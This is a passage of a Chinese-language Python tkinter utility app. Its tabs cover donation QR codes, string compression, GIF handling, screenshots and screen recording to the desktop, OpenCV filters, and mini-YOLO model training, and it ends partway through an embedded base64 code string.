except:
import pypyzbar
fsstxt.delete(0.,tkinter.END)
with open(pypyzbar.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _donate_code(*a):
try:
from . import pyqrcode
except:
import pyqrcode
fsstxt.delete(0.,tkinter.END)
try:
encdlv = pyqrcode.ERROR_CORRECT_L
print('支付宝扫码赞助:')
enctxt = 'HTTPS://QR.ALIPAY.COM/FKX07500WBJ0OXZUXJLUCF'
s = pyqrcode.QRCode(error_correction=encdlv)
s.add_data(enctxt.encode('utf-8'))
for i in s.get_matrix()[3:]:
black = '██'
white = ' '
v = ''.join([black if j else white for j in i])
print(v)
print('微信扫码赞助:')
enctxt = 'wxp://f2f0xF3d1egb-YtPxHm0AZHw0gdJByCgZeLz'
s = pyqrcode.QRCode(error_correction=encdlv)
s.add_data(enctxt.encode('utf-8'))
for i in s.get_matrix()[3:]:
black = '██'
white = ' '
v = ''.join([black if j else white for j in i])
print(v)
except:
print(traceback.format_exc())
style = ttk.Style()
style.map("TEST.TButton",
foreground=[('!focus', '#EE6363')],
)
bss0013_5 = Button(fss0013,text='赞助作者',command=_donate_code,width=7,style='TEST.TButton')
bss0013_5.pack(side=tkinter.LEFT)
bss0013_4 = Button(fss0013,text='加密[算法]',command=_pyqrcode_code,width=9)
bss0013_4.pack(side=tkinter.LEFT)
bss0013_3 = Button(fss0013,text='解密[算法]',command=_pypyzbar_code,width=9)
bss0013_3.pack(side=tkinter.LEFT)
zfcys = r'''
字符串或二进制的简单压缩,嵌入代码
使用有边框进行字符串的压缩处理并输出代码化的脚本
便于让二进制数据能更好更快的嵌入脚本之中(下面压缩算法均为py自带)
'''.strip('\n')
zfcys = '\n' + zfcys
fss0015 = Frame(fss1)
fss0015.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0015, text=zfcys, font=ft).pack(fill=tkinter.X,expand=True)
def _zipstring(*a):
try:
from . import pycompress
except:
import pycompress
w = int(eny0015.get())
b = cbx0015_1.get()
z = cbx0015_2.get()
e = cbx0015_3.get()
f = ibx0015.get()
string = fsstxt.get(0.,tkinter.END).strip('\n')
if f:
v = pycompress.format_compress_file(b, z, w, e)
else:
v = pycompress.format_compress_string(string, b, z, w, e)
fsstxt.delete(0.,tkinter.END)
print(v)
Label(fss0015, text='脚本宽度', font=ft).pack(side=tkinter.LEFT)
eny0015 = Entry(fss0015,width=4)
eny0015.pack(side=tkinter.LEFT)
eny0015.insert(0,'70')
Label(fss0015, text='base模式', font=ft).pack(side=tkinter.LEFT)
cbx0015_1 = Combobox(fss0015,width=6,state='readonly')
cbx0015_1['values'] = ['base64', 'base85']
cbx0015_1.pack(side=tkinter.LEFT)
cbx0015_1.current(0)
Label(fss0015, text='压缩方式', font=ft).pack(side=tkinter.LEFT)
cbx0015_2 = Combobox(fss0015,width=4,state='readonly')
cbx0015_2['values'] = ['zlib', 'lzma', 'gzip', 'None']
cbx0015_2.pack(side=tkinter.LEFT)
cbx0015_2.current(0)
Label(fss0015, text='编码', font=ft).pack(side=tkinter.LEFT)
cbx0015_3 = Combobox(fss0015,width=6,state='readonly')
cbx0015_3['values'] = ['utf-8', 'gbk']
cbx0015_3.pack(side=tkinter.LEFT)
cbx0015_3.current(0)
ibx0015 = tkinter.IntVar()
kbx0015 = Checkbutton(fss0015,text='压缩文件', variable=ibx0015, width=6)
kbx0015.pack(side=tkinter.LEFT)
bss0015_1 = Button(fss0015,text='开始压缩',command=_zipstring, width=9)
bss0015_1.pack(side=tkinter.RIGHT)
_fpic = Frame(fr)
enb.add(_fpic, text='图片相关')
enb.pack()
enb_names[_fpic._name] = '图片相关'
fpic1 = Frame(_fpic)
fpic1.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
fpic1_ = Frame(_fpic)
fpic1_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
txttitlefpic = Frame(fpic1_)
txttitlefpic.pack(side=tkinter.TOP)
Label(txttitlefpic, text='使用以下文本框进行输出').pack(side=tkinter.LEFT,padx=10)
fpicentlimit2 = Entry(txttitlefpic, width=10)
fpicentlimit2.pack(side=tkinter.LEFT)
fpicentlimit2.insert(0,'10000')
fpictxt = Text(fpic1_,font=ft)
fpictxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
fpic0010 = Frame(fpic1)
fpic0010.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0012 = Frame(fpic0010)
fpic0012.pack(side=tkinter.TOP,fill=tkinter.X)
def _find_desktop_gif(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pygif
except:
import pyfinddesktopfile
import pygif
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop('gif')
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs)
v = os.path.join(d, gifs[s.go()])
print('为了提高压缩率,gif图片格式增加了一些透明通道,')
print('所以一些图片出现白色脏点是正常的。')
print('正在解析图片...')
fpictxt.update()
phlist = pygif.mk_phlist(v)
for i in phlist:
fpictxt.image_create(tkinter.END, image=i)
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pygif_code(*a):
try:
from . import pygif
except:
import pygif
fpictxt.delete(0.,tkinter.END)
with open(pygif.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pichelp1 = '''图片相关的处理部分'''
Label(fpic0012, text=pichelp1).pack(side=tkinter.TOP,padx=10)
Button(fpic0012, text='[算法]',command=_pygif_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0012, text=' 这里为 gif 图片切分显示。').pack(side=tkinter.LEFT)
Button(fpic0012, text='从桌面获取gif解析',command=_find_desktop_gif,width=16).pack(side=tkinter.RIGHT)
fpic0020 = Frame(fpic1)
fpic0020.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0022 = Frame(fpic0020)
fpic0022.pack(side=tkinter.TOP,fill=tkinter.X)
def _pyscreenshot(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
screenshot_rect = pyscreenshot.screenshot_rect
dfile = os.path.join(finddesktop(), fpic002ent.get().strip())
bitpng = screenshot_rect(root)
with open(dfile, 'wb') as f:
f.write(bitpng)
print('write in:{}'.format(dfile))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pyscreenshot_code(*a):
try:
from . import pyscreenshot
except:
import pyscreenshot
fpictxt.delete(0.,tkinter.END)
with open(pyscreenshot.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0022, text='[算法]',command=_pyscreenshot_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0022, text=' 截图并存放到桌面,文件名字:').pack(side=tkinter.LEFT)
fpic002ent = Entry(fpic0022,width=10)
fpic002ent.pack(side=tkinter.LEFT)
fpic002ent.insert(0,'_temp.png')
Button(fpic0022, text='截图存放至桌面',command=_pyscreenshot,width=16).pack(side=tkinter.RIGHT)
fpic0030 = Frame(fpic1)
fpic0030.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0032 = Frame(fpic0030)
fpic0032.pack(side=tkinter.TOP,fill=tkinter.X)
def _pyscreenshot_video_local(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
screenshot_rect_int = pyscreenshot.screenshot_rect_int
dfile = os.path.join(finddesktop(), fpic003ent.get().strip())
left,top,w,h = screenshot_rect_int(root)
fpic003ent1.delete(0,tkinter.END)
fpic003ent2.delete(0,tkinter.END)
fpic003ent3.delete(0,tkinter.END)
fpic003ent4.delete(0,tkinter.END)
fpic003ent1.insert(0,str(left))
fpic003ent2.insert(0,str(top))
fpic003ent3.insert(0,str(w))
fpic003ent4.insert(0,str(h))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
fpic003toggle = True
def _pyscreenshot_video(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
_start_video = pyscreenshot._start_video
_stop_video = pyscreenshot._stop_video
nonlocal fpic003toggle
if fpic003toggle:
fpic003btn1['text'] = '录制图片[已开启]'
fpic003toggle = False
try:
left = int(fpic003ent1.get().strip())
top = int(fpic003ent2.get().strip())
w = int(fpic003ent3.get().strip())
h = int(fpic003ent4.get().strip())
rect = (left,top,w,h)
except:
print('error left,top,w,h. use fill desktop.')
rect = pyscreenshot.desktop_ltwh()
_start_video(finddesktop(), rect, fpic003ent.get().strip(), print)
elif not fpic003toggle:
fpic003btn1['text'] = '录制图片[已关闭]'
fpic003toggle = True
_stop_video()
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pyscreenshot_video_code(*a):
try:
from . import pyscreenshot
except:
import pyscreenshot
fpictxt.delete(0.,tkinter.END)
with open(pyscreenshot.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0032, text='[算法]',command=_pyscreenshot_video_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0032, text=' 文件夹:').pack(side=tkinter.LEFT)
fpic003ent = Entry(fpic0032,width=6)
fpic003ent.pack(side=tkinter.LEFT)
fpic003ent.insert(0,'_temp')
Label(fpic0032, text='left').pack(side=tkinter.LEFT)
fpic003ent1 = Entry(fpic0032,width=4)
fpic003ent1.pack(side=tkinter.LEFT)
Label(fpic0032, text='top').pack(side=tkinter.LEFT)
fpic003ent2 = Entry(fpic0032,width=4)
fpic003ent2.pack(side=tkinter.LEFT)
Label(fpic0032, text='w').pack(side=tkinter.LEFT)
fpic003ent3 = Entry(fpic0032,width=4)
fpic003ent3.pack(side=tkinter.LEFT)
Label(fpic0032, text='h').pack(side=tkinter.LEFT)
fpic003ent4 = Entry(fpic0032,width=4)
fpic003ent4.pack(side=tkinter.LEFT)
fpic003btn1 = Button(fpic0032, text='录制图片[已关闭]',command=_pyscreenshot_video,width=16)
fpic003btn1.pack(side=tkinter.RIGHT)
fpic003btn2 = Button(fpic0032, text='定位',command=_pyscreenshot_video_local,width=5)
fpic003btn2.pack(side=tkinter.RIGHT)
fpic0040 = Frame(fpic1)
fpic0040.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0042 = Frame(fpic0040)
fpic0042.pack(side=tkinter.TOP,fill=tkinter.X)
def _pypng2gif(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pypng2gif
except:
import pyfinddesktopfile
import pypng2gif
try:
finddesktop = pyfinddesktopfile.finddesktop
create_gif = pypng2gif.create_gif
filedir = os.path.join(finddesktop(), fpic003ent.get().strip())
filepathname = os.path.join(finddesktop(), fpic004ent1.get().strip())
step = int(fpic004ent2.get().strip())
try:
scale = float(fpic004ent3.get().strip())
except:
scale = None
try:
size_w = int(fpic004ent4.get().strip())
size_h = int(fpic004ent5.get().strip())
size = size_w, size_h
except:
size = None
print('step: ',step)
print('size: ',size)
print('scale:',scale)
realwh = create_gif(filepathname,filedir,size=size,scale=1/scale if scale else None,step=step)
print('write in:{}'.format(filepathname))
print('gif-> wh:{}'.format(realwh))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pypng2gif_code(*a):
try:
from . import pypng2gif
except:
import pypng2gif
fpictxt.delete(0.,tkinter.END)
with open(pypng2gif.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pichelp2 = ''' 以下部分需要使用到第三方库 Pillow (py3)
通过桌面录制的 png 文件生成 gif 文件
鼓励前后部分多录制,因为下面合并 png 的步骤前
可以直接删除部分 png 图片文件来调节 gif 文件前后溢出位。
step : 间隔几张图片
scale : 等比缩放(建议使用)
size_w : 自定义尺寸(不建议使用)
size_h : 自定义尺寸(不建议使用)
(size,scale 最多只有一个有效,不编辑则使用默认)
'''
Label(fpic0042, text=pichelp2).pack(side=tkinter.TOP)
Button(fpic0042, text='[算法]',command=_pypng2gif_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0042, text='生成文件名:').pack(side=tkinter.LEFT)
fpic004ent1 = Entry(fpic0042,width=8)
fpic004ent1.pack(side=tkinter.LEFT)
fpic004ent1.insert(0,'_temp.gif')
Label(fpic0042, text='step').pack(side=tkinter.LEFT)
fpic004ent2 = Entry(fpic0042,width=4)
fpic004ent2.pack(side=tkinter.LEFT)
fpic004ent2.insert(0,'2')
Label(fpic0042, text='scale').pack(side=tkinter.LEFT)
fpic004ent3 = Entry(fpic0042,width=4)
fpic004ent3.pack(side=tkinter.LEFT)
Label(fpic0042, text='size_w').pack(side=tkinter.LEFT)
fpic004ent4 = Entry(fpic0042,width=4)
fpic004ent4.pack(side=tkinter.LEFT)
Label(fpic0042, text='size_h').pack(side=tkinter.LEFT)
fpic004ent5 = Entry(fpic0042,width=4)
fpic004ent5.pack(side=tkinter.LEFT)
Button(fpic0042, text='生成 gif 到桌面',command=_pypng2gif,width=16).pack(side=tkinter.RIGHT)
# opencv
fpic0050 = Frame(fpic1)
fpic0050.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0052 = Frame(fpic0050)
fpic0052.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_canny(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
except:
import pycv2
import pyfinddesktopfile
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
if not gifs: return
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
left = int(fpic005ent1.get().strip())
right = int(fpic005ent2.get().strip())
v = pycv2.canny(v, left, right)
print('shape[h,w] -> {}'.format(v.shape))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pichelp1 = '''以下部分需要使用到第三方库 opencv [pip install opencv-python (py3)]'''
Label(fpic0052, text=pichelp1).pack(side=tkinter.TOP,padx=10)
Button(fpic0052, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0052, text=' Canny').pack(side=tkinter.LEFT)
Button(fpic0052, text='Canny',command=_opencv_canny,width=16).pack(side=tkinter.RIGHT)
Label(fpic0052, text=' 后两项取值范围[0-255],通常默认即可: left').pack(side=tkinter.LEFT)
fpic005ent1 = Entry(fpic0052,width=4)
fpic005ent1.pack(side=tkinter.LEFT)
fpic005ent1.insert(0,'70')
Label(fpic0052, text='right').pack(side=tkinter.LEFT)
fpic005ent2 = Entry(fpic0052,width=4)
fpic005ent2.pack(side=tkinter.LEFT)
fpic005ent2.insert(0,'140')
fpic0060 = Frame(fpic1)
fpic0060.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0062 = Frame(fpic0060)
fpic0062.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_laplacian(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
except:
import pycv2
import pyfinddesktopfile
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
if not gifs: return
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
v = pycv2.laplacian(v)
print('shape[h,w] -> {}'.format(v.shape))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0062, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0062, text=' Laplacian').pack(side=tkinter.LEFT)
Button(fpic0062, text='Laplacian',command=_opencv_laplacian,width=16).pack(side=tkinter.RIGHT)
fpic0070 = Frame(fpic1)
fpic0070.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0072 = Frame(fpic0070)
fpic0072.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_sobel(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
except:
import pycv2
import pyfinddesktopfile
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
if not gifs: return
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
v = pycv2.sobel(v)
print('shape[h,w] -> {}'.format(v.shape))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0072, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0072, text=' Sobel').pack(side=tkinter.LEFT)
Button(fpic0072, text='Sobel',command=_opencv_sobel,width=16).pack(side=tkinter.RIGHT)
fpic0080 = Frame(fpic1)
fpic0080.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0082 = Frame(fpic0080)
fpic0082.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_matchtemplate(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pycv2
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
t = fpic008ent1.get().strip()
f = tempfile.mkdtemp()
if t and os.path.isfile(os.path.join(d, t)):
t = os.path.join(d, t)
else:
t = os.path.join(f, '_desktop_png.png')
with open(t, 'wb') as f:
f.write(pyscreenshot.screenshot())
v = pycv2.findmatchtemplate(v, t)
print('top,left,w,h -> {}'.format(v))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0082, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0082, text=' MatchTemplate').pack(side=tkinter.LEFT)
Button(fpic0082, text='MatchTemplate',command=_opencv_matchtemplate,width=16).pack(side=tkinter.RIGHT)
Label(fpic0082, text=' 背景图片,不填则默认桌面').pack(side=tkinter.LEFT)
fpic008ent1 = Entry(fpic0082,width=10)
fpic008ent1.pack(side=tkinter.LEFT)
fpic0090 = Frame(fpic1)
fpic0090.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0092 = Frame(fpic0090)
fpic0093 = Frame(fpic0090)
fpic0094 = Frame(fpic0090)
fpic0095 = Frame(fpic0090)
fpic0096 = Frame(fpic0090)
fpic0097 = Frame(fpic0090)
pichelp1 = '''
使用 pytorch 的模型快速训练简单的目标点选
以下部分需要使用到两个第三方库 opencv,以及 pytorch 。
之所以目前仅使用 voc 数据集是因为 labelimg 默认生成这种格式
并且 voc 格式在多标注方面用起来会很方便,这种格式的数据也会很清晰
* 注意,voc数据的图片文件路径请尽量和 voc标注数据的xml文件路径保持一致
因为代码在xml文件的path找不到图片就会在xml相同地址下找同名图片文件。
这样会很方便你剪贴训练数据集在不同地址进行训练。
* 注意,该工具内直接使用的训练模型是固定的,如果想要进行更高的自定义
请直接点击 “算法” 按钮,获取训练+测试脚本。
* 默认每个 epoch 保存一次模型文件,默认支持中断继续训练。
'''.strip('\n')
Label(fpic0092, text=pichelp1).pack(side=tkinter.TOP,padx=10)
fpic0092.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0093.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0094.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0095.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0096.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0097.pack(side=tkinter.TOP,fill=tkinter.X)
train_data, imginfos, class_types, anchors = None, None, None, None
def _load_voc_data(*a):
def load_voc_data(xmlpath, anchors):
files = [os.path.join(xmlpath, path) for path in os.listdir(xmlpath) if path.endswith('.xml')]
imginfos = []
print('use anchors:', anchors)
print('load xml file number:{}, start.'.format(len(files)))
for idx, file in enumerate(files, 1):
if idx % 1000 == 0: print('loading {}/{}'.format(idx, len(files)))
imginfos.extend(pymini_yolo.read_voc_xml(file, islist=True))
if idx % 1000 != 0: print('loading {}/{}'.format(idx, len(files)))
# 注意这里加载数据的方式是小批量加载处理,所以自动生成 class_types
# 如果有大量数据想要进行多批次训练,那么就需要注意 class_types 的生成。
class_types = [imginfo.get('cate') for imginfo in imginfos]
class_types = {typ:idx for idx,typ in enumerate(sorted(list(set(class_types))))}
print('class_types:', class_types)
train_data = []
print('make x_true,y_true. start.')
for idx, imginfo in enumerate(imginfos, 1):
if idx % 1000 == 0: print('makeing x_true,y_true. {}/{}'.format(idx, len(imginfos)))
x_true = pymini_yolo.torch.FloatTensor(imginfo['numpy'])
y_true = pymini_yolo.make_y_true(imginfo, 13, anchors, class_types)
train_data.append([x_true, y_true])
if idx % 1000 != 0: print('makeing x_true,y_true. {}/{}'.format(idx, len(imginfos)))
print('make x_true,y_true. ok.')
return train_data, imginfos, class_types
try:
xmlpath = fpic009ent1.get().strip()
if not os.path.isdir(xmlpath):
print('无效的 voc 文件地址。')
return
print('importing pytorch, opencv.')
try:
from . import pymini_yolo
except:
import pymini_yolo
print('import ok.')
nonlocal train_data, imginfos, class_types, anchors
anchors = [[60, 60]]
train_data, imginfos, class_types = load_voc_data(xmlpath, anchors)
except:
print(traceback.format_exc())
fpictxt.see(tkinter.END)
def _pymini_yolo_code(*a):
fpictxt.delete(0.,tkinter.END)
path = os.path.join(os.path.split(__file__)[0], 'pymini_yolo.py')
with open(path, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _set_train_file_dir(*a):
import tkinter.filedialog
dirpath = tkinter.filedialog.askdirectory()
print(dirpath)
fpic009ent1.delete(0,tkinter.END)
fpic009ent1.insert(tkinter.END, dirpath)
if not fpic0095ent1.get().strip():
fpic0095ent1.insert(tkinter.END, dirpath)
def _save_train_model_dir(*a):
import tkinter.filedialog
dirpath = tkinter.filedialog.askdirectory()
print(dirpath)
fpic0094ent1.delete(0,tkinter.END)
fpic0094ent1.insert(tkinter.END, dirpath)
def _save_test_model_dir(*a):
import tkinter.filedialog
dirpath = tkinter.filedialog.askdirectory()
print(dirpath)
fpic0095ent1.delete(0,tkinter.END)
fpic0095ent1.insert(tkinter.END, dirpath)
stop = True
def _pystoptrain_mini_yolo(*a):
nonlocal stop
print(stop)
stop = True
def _pytrain_mini_yolo(*a):
nonlocal train_data, class_types
if train_data is None:
print('没有加载训练数据。')
return
print('importing pytorch, opencv.')
try:
from . import pymini_yolo
except:
import pymini_yolo
print('import ok.')
nonlocal stop
if stop == True:
stop = False
else:
print('正在训练')
return
def train(train_data, anchors, class_types):
nonlocal stop
train_loader = pymini_yolo.Data.DataLoader(
dataset = train_data,
batch_size = BATCH_SIZE,
shuffle = True,
)
modelfilepath = os.path.join(fpic0094ent1.get().strip(), 'net.pkl')
try:
state = pymini_yolo.torch.load(modelfilepath)
net = pymini_yolo.Mini(anchors, class_types)
net.load_state_dict(state['net'])
net.to(pymini_yolo.DEVICE)
optimizer = state['optimizer']
epoch = state['epoch']
print('load train.')
except:
excp = traceback.format_exc()
if 'FileNotFoundError' not in excp:
print(excp)
net = pymini_yolo.Mini(anchors, class_types)
net.to(pymini_yolo.DEVICE)
optimizer = pymini_yolo.torch.optim.Adam(net.parameters(), lr=LR)
epoch = 0
print('new train.')
yloss = pymini_yolo.yoloLoss(13, anchors=anchors, class_types=class_types, )
net.train()
for epoch in range(epoch, epoch+EPOCH):
print('epoch', epoch)
for step, (x_true_, y_true_) in enumerate(train_loader):
print('[{:<3}]'.format(step), end='')
x_true = pymini_yolo.Variable(x_true_).to(pymini_yolo.DEVICE)
y_true = pymini_yolo.Variable(y_true_).to(pymini_yolo.DEVICE)
output = net(x_true)
loss = yloss(output, y_true, print)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if stop: break
fpictxt.see(tkinter.END)
if stop: break
state = {'net':net.state_dict(), 'optimizer':optimizer, 'epoch':epoch+1,
'anchors':anchors, 'class_types':class_types}
pymini_yolo.torch.save(state, modelfilepath)
print('save.')
print('end.')
try:
EPOCH = int(fpic0092ent1.get().strip())
BATCH_SIZE = int(fpic0092ent2.get().strip())
LR = float(fpic0092ent3.get().strip())
anchors = eval(fpic0092ent4.get().strip())
print('EPOCH:{}, BATCH_SIZE:{}, LR:{}, anchors:{}.'.format(EPOCH,BATCH_SIZE,LR,anchors))
threading.Thread(target=train, args=(train_data, anchors, class_types)).start()
except:
print(traceback.format_exc())
def _test_mini_yolo_data(*a):
filepath = fpic0095ent1.get().strip()
if not os.path.isdir(filepath):
print('无效的测试数据地址。')
return
if re.findall('[\u4e00-\u9fa5]', filepath):
print('无效的测试数据地址,opencv 加载图片地址不能含有中文。')
return
try:
try:
from . import pymini_yolo
except:
import pymini_yolo
modelfilepath = os.path.join(fpic0094ent1.get().strip(), 'net.pkl')
if not os.path.isfile(modelfilepath):
print('模型文件不存在 {}'.format(modelfilepath))
return
state = pymini_yolo.load_net(modelfilepath)
idx = 0
for file in os.listdir(filepath):
if file.lower().endswith('jpg') or file.lower().endswith('png') or file.lower().endswith('jpeg'):
_file = os.path.join(filepath, file)
pymini_yolo.get_all_draw_rects(_file, state)
idx += 1
if idx == 5:
return
except:
print(traceback.format_exc())
def _create_use_mini_yolo_code(*a):
zstring = (
'rRhrb9vW9bt+xUXyQaRN0RIlG4kwDYgTpw2WR5Gke0A1CJq8kpjwNZKyyHQFsq5rYqxp2mFt0zTd1g19DGjSDlmGrknaH7NIdj/lL+yce/mW7dTBHIQizz3ve173HibTR1enN9998u3b'
'xIvDkeu0a4fJk+8+3nnwPgJcXx89fXT76aPr03u3th+/O9v6bnpva+fvv5+9/5/po5tPH20l9I+/3/7TF9tb12d3vnzyzbeEETZackduNnSvvcIedmNiOqpmGysdeTKyckGuRx19E+QQ'
'EOSZHjGdINQsK1lo6K4T+uZGg2vY67WBb0tuLYP4H+5c3fnst1x8YA7C6UffTX93c/veB7P77/336uuzratPHn46u//F7I2bXHGuIyzVQP72R/+avf3pbOvznU/emt64P7351ezBH3a+'
'eq9WM23P9UOibyrpqzO2vZhoAXG8FMSsLH3IjsNQnIyDG6RvthaOagPftYnuWhbVQ9N1ApIsnvMN6lPjhKmHtdrLF9bU4y+fOEZ65KI/psQcJNz1saHJZqBqm5ppaRsWFURCrYCSkxo8'
'ayfWfn7q+BpQ1RGxjnQZK4ZW171xHQ2ffv3m9sObO99fIxuafnnDdSjZvv3G9l/+8cOtB7P3vp7duLfz+MvZjb/Nrr8z/fid2V+vTf/41vT6m9v/fDh958b07gc1gw6Ip/kBVWPVA8WF'
'GJ8S0Rx95PqBRHRLCwI1jD0KH2ZgmUHYY1pKJBz5NBi5ltFryopEHBvwcpDYrRH406kJTnLAmOVF+BUK/ESGEJhD2zUNQLA0e8PQSNRtLQmtRXSzTCNPaEQixzSdgRsAXn+dfQ5cn5hG'
'BGDia86QCsg+0VtMpDOy3Hs5EP804MXM7Xcl/NdZBHYLicLrMvhYEGWDhpo+ghcWN4KYccCNOBC/PTkxQ0zJREsoLFJfC6mg9ZvrYlkAIl66JF0qI5oVrMxVsuZB3hmCAMyBDJSREmcL'
'l8SKTwMIXth99imRyzTuJbthdhtmv73OsTFahjRUoziKVd26okJGM5qCCkPNA36d1soS84UcjDSP9lvrGUIkxUwXoAVEpM5pkbTgtGwBK4dmIj5PoNQO7u6mhDyH3mJnPfcqroCizyJp'
